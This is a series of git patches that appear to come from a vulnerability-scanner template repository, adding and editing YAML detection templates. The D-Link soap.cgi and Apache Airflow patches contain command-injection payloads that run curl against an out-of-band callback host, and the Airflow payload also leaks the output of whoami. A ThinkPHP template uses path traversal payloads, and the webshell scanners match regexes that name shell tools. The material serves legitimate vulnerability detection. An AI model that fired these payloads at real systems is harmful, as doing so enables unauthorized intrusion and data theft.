From 26c8ac5ee933fa2bed7793670f45190a40e363f2 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 2 Oct 2022 22:15:14 +0900 Subject: [PATCH 001/609] Create CVE-2018-6530 OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. Signed-off-by: GwanYeong Kim --- cves/2018/CVE-2018-6530.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2018/CVE-2018-6530.yaml diff --git a/cves/2018/CVE-2018-6530.yaml b/cves/2018/CVE-2018-6530.yaml new file mode 100644 index 0000000000..b21a673f5e --- /dev/null +++ b/cves/2018/CVE-2018-6530.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-6530 + +info: + name: D-Link - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: | + OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-6530 + - https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto + - https://www.cisa.gov/known-exploited-vulnerabilities-catalog + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 9.8 + cve-id: CVE-2018-6530 + cwe-id: CWE-78 + tags: cve,cve2018,d-link,rce,oast,unauth + +requests: + - raw: + - | + POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: identity + SOAPAction: "whatever-serviceType#whatever-action" + Content-Type: text/xml + + whatever-content + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" +# Enhanced by mp on 2022/04/26 From 619f9fd7e04ff58fc8a0e6078286582a12900edf Mon Sep 17 00:00:00 2001 From: lu4nx Date: Fri, 11 Nov 2022 16:51:52 +0800 Subject: [PATCH 002/609] Add ASP.NET, ASP, JSP and PHP webshell scanner --- file/webshell/asp.yaml | 33 +++++++++++++++++++++++++++++++++ file/webshell/jsp.yaml | 25 +++++++++++++++++++++++++ file/webshell/php.yaml | 41 +++++++++++++++++++++++++++++++++++++++++ 3 files changed, 99 insertions(+) create mode 100644 file/webshell/asp.yaml create mode 100644 file/webshell/jsp.yaml create mode 100644 file/webshell/php.yaml diff --git a/file/webshell/asp.yaml b/file/webshell/asp.yaml new file mode 100644 index 0000000000..785a811e66 --- /dev/null +++ b/file/webshell/asp.yaml @@ -0,0 +1,33 @@ +id: asp-webshell-scanner + +info: + name: ASP/ASP.NET Webshell Scanner + author: lu4nx + severity: high + reference: + - https://github.com/tennc/webshell + tags: asp,asp.net,file + +file: + - extensions: + - asp + - asa + - aspx + - ashx + - asmx + - asax + + extractors: + - type: regex + regex: + # <%eval request("xx")%> + - '(?i)(eval)' + - '(?i)(eval|execute)\(' + - '(?i)wscript.shell' + - '(?i)ExecuteStatement' + - '(?i)cmd.exe' + - type: regex + regex: + # mmshell = 'xxx' + - '(?i)mmshell' + - '(?i)GetCmd' diff --git a/file/webshell/jsp.yaml b/file/webshell/jsp.yaml new file mode 100644 index 0000000000..603a3964e4 --- /dev/null +++ b/file/webshell/jsp.yaml @@ -0,0 +1,25 @@ +id: jsp-webshell-scanner + +info: + name: JSP Webshell Scanner + author: lu4nx + severity: high + reference: + - https://github.com/tennc/webshell + tags: jsp,file + +file: + - extensions: + - jsp + - java + + extractors: + - type: regex + regex: + - '(?i)(ClassLoader|exec|eval|ProcessBuilder|getInputStream|loadClass|defineClass|URLClassLoader)\(' + - '(?i)cmd.exe' + - '(?i)/bin/sh' + - '(?i)/bin/bash' + - type: regex + regex: + - '(?i)exeCmd' diff --git a/file/webshell/php.yaml b/file/webshell/php.yaml new file mode 100644 index 0000000000..d2a91bf46c --- /dev/null +++ b/file/webshell/php.yaml @@ -0,0 +1,41 @@ +id: php-webshell-scanner + +info: + name: PHP Webshell Scanner + author: lu4nx + severity: high + reference: + - https://github.com/tennc/webshell + tags: php,file + +file: + - extensions: + - php + + extractors: + - type: regex + regex: + - '(?i)\b(passthru|eval|exec|system|phpinfo|assert|call_user_func|call_user_func_array)\(' + - '(?i)cmd.exe' + - '(?i)/bin/sh' + - '(?i)/bin/bash' + - '(?i)WScript.Shell' + - type: regex + regex: + - '(?i)gzuncompress\(base64_decode\(' + # Example: $array[0]['tt']($_POST['tt1234']); + - '\]\(\$_(GET|POST|COOKIE|REQUEST)\[' + # Example: + # $f = new class($_POST['name']) extends ReflectionFunction {}; + # $f->invoke($_POST[xxx]); + - '(?i)new\s*(ReflectionFunction|ReflectionClass)' + # Reference: https://github.com/mm0r1/exploits/blob/master/php-filter-bypass/exploit.php + - '(?i)0x647261646e617473' + # Reference: https://github.com/upsi1on/webshell/blob/main/upsi1on/upsi1on.php#L1173 + - '65786563' # exec + # Example: + # $a = substr('1a',1).'s'.'s'.'e'.'r'.'t'; + # $a($_POST['x']); + - '(?i)\$\w+\(\$_(GET|POST|COOKIE|REQUEST)' + - '(?i)b4tm4n' + - '(?i)cmdshell' From 7692a6bd9f4a61a1f136ca10a1ba020eb58c7d35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 23 Nov 2022 18:11:34 +0530 Subject: [PATCH 003/609] Create CVE-2022-40127.yaml --- cves/2022/CVE-2022-40127.yaml | 69 +++++++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 cves/2022/CVE-2022-40127.yaml diff --git a/cves/2022/CVE-2022-40127.yaml b/cves/2022/CVE-2022-40127.yaml new file mode 100644 index 0000000000..1ed11cd971 --- /dev/null +++ b/cves/2022/CVE-2022-40127.yaml @@ -0,0 +1,69 @@ +id: CVE-2022-40127 + +info: + name: AirFlow < 2.4.0 - RCE + author: DhiyaneshDk,ritikchaddha + severity: high + description: | + A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. + reference: + - https://github.com/Mr-xn/CVE-2022-40127 + - https://nvd.nist.gov/vuln/detail/CVE-2022-40127 + classification: + cve-id: CVE-2022-40127 + metadata: + shodan-query: title:"Sign In - Airflow" + tags: cve,cve2022,airflow,rce,oast + +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + + - | + @timeout: 15s + POST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Content-Type: application/json + Origin: {{BaseURL}} + + { + "conf": { + "dag_run": "{{randstr}}" + }, + "dag_run_id": "id \"&& curl `id`.{{interactsh-url}}", + "logical_date": "{{date_time("%Y-%M-%D")}}T{{date_time("%H:%m:%s")}}.920Z" + + } + + cookie-reuse: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'state": "queued"' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf_token + group: 1 + internal: true + regex: + - 'type="hidden" value="(.*?)">' From ebb5a6e6252ea25eec3618063fe0972737ed520c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 23 Nov 2022 18:12:45 +0530 Subject: [PATCH 004/609] Update CVE-2022-40127.yaml --- cves/2022/CVE-2022-40127.yaml | 10 +--------- 1 file changed, 1 insertion(+), 9 deletions(-) diff --git a/cves/2022/CVE-2022-40127.yaml b/cves/2022/CVE-2022-40127.yaml index 1ed11cd971..def6b56a98 100644 --- a/cves/2022/CVE-2022-40127.yaml +++ b/cves/2022/CVE-2022-40127.yaml @@ -49,7 +49,7 @@ requests: } cookie-reuse: true - matchers-condition: or + matchers-condition: and matchers: - type: word part: body @@ -59,11 +59,3 @@ requests: - type: status status: - 200 - - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' From 54ec096f42c98b429d4eb6959f1073de5ee55b5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 23 Nov 2022 18:13:49 +0530 Subject: [PATCH 005/609] Update CVE-2022-40127.yaml --- cves/2022/CVE-2022-40127.yaml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/cves/2022/CVE-2022-40127.yaml b/cves/2022/CVE-2022-40127.yaml index def6b56a98..01b737329e 100644 --- a/cves/2022/CVE-2022-40127.yaml +++ b/cves/2022/CVE-2022-40127.yaml @@ -59,3 +59,11 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + name: csrf_token + group: 1 + internal: true + regex: + - 'type="hidden" value="(.*?)">' From 502d69a549da2ed24c0ba2c99d2e6f85ff54fce3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 23 Nov 2022 18:17:53 +0530 Subject: [PATCH 006/609] Update CVE-2022-40127.yaml --- cves/2022/CVE-2022-40127.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-40127.yaml b/cves/2022/CVE-2022-40127.yaml index 01b737329e..f08ebebe5e 100644 --- a/cves/2022/CVE-2022-40127.yaml +++ b/cves/2022/CVE-2022-40127.yaml @@ -43,7 +43,7 @@ requests: "conf": { "dag_run": "{{randstr}}" }, - "dag_run_id": "id \"&& curl `id`.{{interactsh-url}}", + "dag_run_id": "id \"&& curl `whoami`.{{interactsh-url}}", "logical_date": "{{date_time("%Y-%M-%D")}}T{{date_time("%H:%m:%s")}}.920Z" } From bf2d7c3adaed3a2bc5caab130938196cdb3f5036 Mon Sep 17 00:00:00 2001 From: arliya Date: Tue, 20 Dec 2022 23:36:04 -0500 Subject: [PATCH 007/609] CNVD-2022-86535 --- cnvd/2022/CNVD-2022-86535.yaml | 53 ++++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 cnvd/2022/CNVD-2022-86535.yaml diff --git a/cnvd/2022/CNVD-2022-86535.yaml b/cnvd/2022/CNVD-2022-86535.yaml new file mode 100644 index 0000000000..8132c67bd1 --- /dev/null +++ b/cnvd/2022/CNVD-2022-86535.yaml @@ -0,0 +1,53 @@ +id: CNVD-2022-86535 +info: + name: Thinkphp Multi Language File Inc And RCE + author: arliya + severity: high + description: 'ThinkPHP is an open source lightweight PHP framework designed to simplify enterprise application development and agile WEB application development. ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.' + reference: ["https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535"] + tags: 'cnvd,cnvd2022,thinkphp,rce' + +variables: + random-path: "{{to_lower(rand_base(8))}}" + +# The version with the bug will set the value of the parameter after lang to the cookie regardless of whether the file +# was successfully included, while the fixed version will return the language specified by the client accept-language +stop-at-first-match: true +requests: +# check by url + - method: GET + path: + - "{{BaseURL}}/public/?lang=../../../../../public/{{random-path}}" + - "{{BaseURL}}/index.php?lang=../../../../../public/{{random-path}}" + - "{{BaseURL}}/?lang=../../../../../public/{{random-path}}" + matchers: + - type: word + part: header + words: + - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}" +# check by header + - method: GET + path: + - "{{BaseURL}}/public/index.php" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/" + headers: + think-lang: ../../../../../public/{{random-path}} + matchers: + - type: word + part: header + words: + - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}" +# check by cookie + - method: GET + path: + - "{{BaseURL}}/public/index.php" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/" + headers: + Cookie: think_lang=../../../../../public/{{random-path}} + matchers: + - type: word + part: header + words: + - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}" \ No newline at end of file From a551dcfbd8a577f185b0e46b047a00c3529c0115 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:17:07 +0100 Subject: [PATCH 008/609] package-json: add yarn and remove package-lock.json - add yarn that use and generates package.json too - remove package-lock.json since it's specific to npm --- exposures/configs/package-json.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/exposures/configs/package-json.yaml b/exposures/configs/package-json.yaml index c397c41544..88d6bcf625 100644 --- a/exposures/configs/package-json.yaml +++ b/exposures/configs/package-json.yaml @@ -2,16 +2,18 @@ id: package-json info: name: npm package.json disclosure - author: geeknik,afaq + author: geeknik,afaq,noraj severity: info - description: All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. + description: All NodeJS packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project generated by package managers such as npm or yarn. + reference: + - https://docs.npmjs.com/cli/v9/configuring-npm/package-json + - https://classic.yarnpkg.com/lang/en/docs/package-json/ tags: config,exposure requests: - method: GET path: - "{{BaseURL}}/package.json" - - "{{BaseURL}}/package-lock.json" matchers-condition: and matchers: @@ -28,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 7ee9060007969c41c953d5fe414b1560a7f9d13d Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:19:54 +0100 Subject: [PATCH 009/609] yarn-lock: add ref --- exposures/files/yarn-lock.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposures/files/yarn-lock.yaml b/exposures/files/yarn-lock.yaml index 863daf19ec..0cdab5e5a0 100644 --- a/exposures/files/yarn-lock.yaml +++ b/exposures/files/yarn-lock.yaml @@ -2,9 +2,11 @@ id: yarn-lock info: name: yarn lock file disclosure - author: oppsec + author: oppsec,noraj severity: info - description: The yarn.lock file stores the versions of each Yarn dependency installed. + description: The yarn.lock file stores the versions of each Yarn dependency installed. It's a lock file for package.json. + reference: + - https://classic.yarnpkg.com/lang/en/docs/yarn-lock/ tags: exposure,files requests: From 89bdd0d158a656f75626abdfe11872878ed42081 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:23:51 +0100 Subject: [PATCH 010/609] npm-shrinkwrap-exposure: add ref and desc --- exposures/files/npm-shrinkwrap-exposure.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposures/files/npm-shrinkwrap-exposure.yaml b/exposures/files/npm-shrinkwrap-exposure.yaml index 8bd6061cc0..02a38bec76 100644 --- a/exposures/files/npm-shrinkwrap-exposure.yaml +++ b/exposures/files/npm-shrinkwrap-exposure.yaml @@ -2,11 +2,14 @@ id: npm-shrinkwrap-exposure info: name: Node Shrinkwrap Exposure - author: DhiyaneshDk + author: DhiyaneshDk,noraj severity: info metadata: verified: true shodan-query: html:"npm-shrinkwrap.json" + description: A file created by npm shrinkwrap. It is identical to package-lock.json. + reference: + - https://docs.npmjs.com/cli/v9/configuring-npm/npm-shrinkwrap-json tags: config,exposure,npm,files requests: From 87bfdfb3d84edb5470f8b356a7ab1270b261ceb4 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:32:36 +0100 Subject: [PATCH 011/609] npm-package-lock: creation move out from package.json template since package.json is both for npm and yarn while package-lock.json is npm specific lock file and yarn.lock for yarn --- exposures/files/npm-package-lock-json.yaml | 32 ++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/files/npm-package-lock-json.yaml diff --git a/exposures/files/npm-package-lock-json.yaml b/exposures/files/npm-package-lock-json.yaml new file mode 100644 index 0000000000..9a738f4c6c --- /dev/null +++ b/exposures/files/npm-package-lock-json.yaml @@ -0,0 +1,32 @@ +id: npm-package-lock + +info: + name: npm package-lock.json disclosure + author: noraj + severity: info + description: File automatically generated for any operations where npm modifies either the node_modules tree, or package.json. It's a lock file for package.json. + reference: + - https://docs.npmjs.com/cli/v9/configuring-npm/package-json + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/package-lock.json" + + matchers-condition: and + matchers: + - type: word + words: + - "name" + - "version" + condition: and + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 From 7188aa43b240f21e639f24c3abad9d771c5b524a Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:35:48 +0100 Subject: [PATCH 012/609] bower-json: add reference --- exposures/files/bower-json.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/files/bower-json.yaml b/exposures/files/bower-json.yaml index 322a0be909..6aaed4a6d7 100644 --- a/exposures/files/bower-json.yaml +++ b/exposures/files/bower-json.yaml @@ -2,9 +2,11 @@ id: bower-json info: name: bower.json file disclosure - author: oppsec + author: oppsec,noraj severity: info description: Bower is a package manager which stores package information in the bower.json file + reference: + - https://github.com/bower/spec/blob/master/json.md tags: exposure,files requests: From c6b355aecd917849c7e20322becb1bd6658e48e7 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:41:11 +0100 Subject: [PATCH 013/609] package-json: add pnpm --- exposures/configs/package-json.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/package-json.yaml b/exposures/configs/package-json.yaml index 88d6bcf625..bb82784c2b 100644 --- a/exposures/configs/package-json.yaml +++ b/exposures/configs/package-json.yaml @@ -4,10 +4,11 @@ info: name: npm package.json disclosure author: geeknik,afaq,noraj severity: info - description: All NodeJS packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project generated by package managers such as npm or yarn. + description: All NodeJS packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project generated by package managers such as npm, yarn, pnpm. reference: - https://docs.npmjs.com/cli/v9/configuring-npm/package-json - https://classic.yarnpkg.com/lang/en/docs/package-json/ + - https://pnpm.io/package_json tags: config,exposure requests: From 09b8edd2d662537f3cab15f5a66407ecf0cd9deb Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:45:58 +0100 Subject: [PATCH 014/609] update id for package-lock.json to keep it uniforms with other templates --- exposures/files/npm-package-lock-json.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/npm-package-lock-json.yaml b/exposures/files/npm-package-lock-json.yaml index 9a738f4c6c..dd3d5350e5 100644 --- a/exposures/files/npm-package-lock-json.yaml +++ b/exposures/files/npm-package-lock-json.yaml @@ -1,4 +1,4 @@ -id: npm-package-lock +id: npm-package-lock-json info: name: npm package-lock.json disclosure From db4de6e261ead1c50e7ef5f48b68877a1f740a59 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:50:49 +0100 Subject: [PATCH 015/609] pnpm-pnpm-lock-yaml: creation --- exposures/files/pnpm-pnpm-lock-yaml.yaml | 33 ++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposures/files/pnpm-pnpm-lock-yaml.yaml diff --git a/exposures/files/pnpm-pnpm-lock-yaml.yaml b/exposures/files/pnpm-pnpm-lock-yaml.yaml new file mode 100644 index 0000000000..90d6fdf265 --- /dev/null +++ b/exposures/files/pnpm-pnpm-lock-yaml.yaml @@ -0,0 +1,33 @@ +id: pnpm-pnpm-lock-yaml + +info: + name: pnpm pnpm-lock.yaml disclosure + author: noraj + severity: info + description: File automatically generated for any operations where pnpm modifies either the node_modules tree, or package.json. It's a lock file for package.json. + reference: + - https://pnpm.io/cli/install#tldr + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}/pnpm-lock.yaml" + + matchers-condition: and + matchers: + - type: word + words: + - "lockfileVersion" + - "specifiers" + - "dependencies" + condition: and + + - type: word + words: + - "application/yaml" + part: header + + - type: status + status: + - 200 From 6e28f4c88bb0818a81dbbca45f68150aa7db80c1 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:51:57 +0100 Subject: [PATCH 016/609] uniform naming --- exposures/files/npm-package-lock-json.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/npm-package-lock-json.yaml b/exposures/files/npm-package-lock-json.yaml index dd3d5350e5..13c59afae5 100644 --- a/exposures/files/npm-package-lock-json.yaml +++ b/exposures/files/npm-package-lock-json.yaml @@ -1,4 +1,4 @@ -id: npm-package-lock-json +id: package-lock-json info: name: npm package-lock.json disclosure From bfc5c40e738c8c8ef12ca8c9b60eea778e9d3ca4 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 18:52:18 +0100 Subject: [PATCH 017/609] uniform naming --- exposures/files/pnpm-pnpm-lock-yaml.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/pnpm-pnpm-lock-yaml.yaml b/exposures/files/pnpm-pnpm-lock-yaml.yaml index 90d6fdf265..e82b8c0c28 100644 --- a/exposures/files/pnpm-pnpm-lock-yaml.yaml +++ b/exposures/files/pnpm-pnpm-lock-yaml.yaml @@ -1,4 +1,4 @@ -id: pnpm-pnpm-lock-yaml +id: pnpm-lock-yaml info: name: pnpm pnpm-lock.yaml disclosure From 29201973cdbde435cb4658c69cf11190d1c2c0fa Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Fri, 6 Jan 2023 19:18:32 +0100 Subject: [PATCH 018/609] add to contributors --- contributors.json | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/contributors.json b/contributors.json index abd26306fc..c1c47ca9df 100644 --- a/contributors.json +++ b/contributors.json @@ -1378,6 +1378,15 @@ "website": "https://the-empire.systems", "email": "" } - } - + }, + { + "author": "noraj", + "links": { + "github": "https://github.com/noraj", + "twitter": "https://twitter.com/noraj_rawsec", + "linkedin": "", + "website": "https://pwn.by/noraj", + "email": "" + } + }, ] From df7db6e8acc4ca34ad878470e4ca039111bf94a1 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 13:43:35 -0400 Subject: [PATCH 019/609] Enhancement: cves/2017/CVE-2017-16894.yaml by md --- cves/2017/CVE-2017-16894.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-16894.yaml b/cves/2017/CVE-2017-16894.yaml index 646c64cb53..650062c496 100644 --- a/cves/2017/CVE-2017-16894.yaml +++ b/cves/2017/CVE-2017-16894.yaml @@ -1,16 +1,17 @@ id: CVE-2017-16894 info: - name: Laravel framework < 5.5.21 - Infomation Disclosure + name: Laravel <5.5.21 - Infomation Disclosure author: j4vaovo severity: high description: | - In Laravel framework through 5.5.21, remote attackers can obtain sensitive information (such as externally usable passwords) via a direct request for the /.env URI. NOTE: this CVE is only about Laravel framework's writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting the .env permissions. The .env filename is not used exclusively by Laravel framework. + Laravel through 5.5.21 is susceptible to information disclosure. An attacker can obtain sensitive information such as externally usable passwords via a direct request for the /.env URI. NOTE: CVE pertains only to the writeNewEnvironmentFileWith function in src/Illuminate/Foundation/Console/KeyGenerateCommand.php, which uses file_put_contents without restricting .env permissions. The .env filename is not used exclusively by Laravel. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16894 - https://packetstormsecurity.com/files/cve/CVE-2017-16894 - http://whiteboyz.xyz/laravel-env-file-vuln.html - https://twitter.com/finnwea/status/967709791442341888 + - https://nvd.nist.gov/vuln/detail/CVE-2017-16894 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -45,3 +46,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/20 From cb1488688aae57ed0d7cc940620580389bdd96da Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 13:55:22 -0400 Subject: [PATCH 020/609] Enhancement: cves/2021/CVE-2021-35250.yaml by md --- cves/2021/CVE-2021-35250.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-35250.yaml b/cves/2021/CVE-2021-35250.yaml index b25ecf0806..d70723493b 100644 --- a/cves/2021/CVE-2021-35250.yaml +++ b/cves/2021/CVE-2021-35250.yaml @@ -5,18 +5,19 @@ info: author: johnk3r,pdteam severity: high description: | - A researcher reported a Directory Traversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1. + SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://github.com/rissor41/SolarWinds-CVE-2021-35250 - - https://nvd.nist.gov/vuln/detail/CVE-2021-35250 - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250 - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg + - https://nvd.nist.gov/vuln/detail/CVE-2021-35250 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-35250 cwe-id: CWE-22 + remediation: Resolved in Serv-U 15.3 Hotfix 1. metadata: shodan-query: product:"Rhinosoft Serv-U httpd" tags: cve,cve2021,solarwinds,traversal @@ -40,3 +41,5 @@ requests: - type: status status: - 401 + +# Enhanced by md on 2023/04/20 From 075f3b66c8f9e5e950476600192c634081f42e02 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:03:55 -0400 Subject: [PATCH 021/609] Enhancement: cves/2023/CVE-2023-27159.yaml by md --- cves/2023/CVE-2023-27159.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2023/CVE-2023-27159.yaml b/cves/2023/CVE-2023-27159.yaml index 56eb4d6279..acf90b58ac 100644 --- a/cves/2023/CVE-2023-27159.yaml +++ b/cves/2023/CVE-2023-27159.yaml @@ -1,15 +1,19 @@ id: CVE-2023-27159 info: - name: Appwrite <= 1.2.1 - Server-Side Request Forgery + name: Appwrite <=1.2.1 - Server-Side Request Forgery author: DhiyaneshDk severity: medium description: | - Appwrite up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /v1/avatars/favicon. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request. + Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://gist.github.com/b33t1e/43b26c31e895baf7e7aea2dbf9743a9a - https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA + - https://nvd.nist.gov/vuln/detail/CVE-2023-27159 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-918 cve-id: CVE-2023-27159 metadata: verified: "true" @@ -32,3 +36,5 @@ http: part: interactsh_request words: - "User-Agent: Appwrite-Server" + +# Enhanced by md on 2023/04/20 From 9f6cbb55918c3ea9bedc7e18916ba14d3ee44164 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 2023 14:06:59 -0400 Subject: [PATCH 022/609] Enhancement: default-logins/adminer-default-login.yaml by md --- default-logins/adminer-default-login.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/default-logins/adminer-default-login.yaml b/default-logins/adminer-default-login.yaml index af460f5c44..5a365569bd 100644 --- a/default-logins/adminer-default-login.yaml +++ b/default-logins/adminer-default-login.yaml @@ -61,3 +61,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/04/20 From d1b5b880b61a53244da921ca4794b79b72d3fd2f Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Thu, 20 Apr 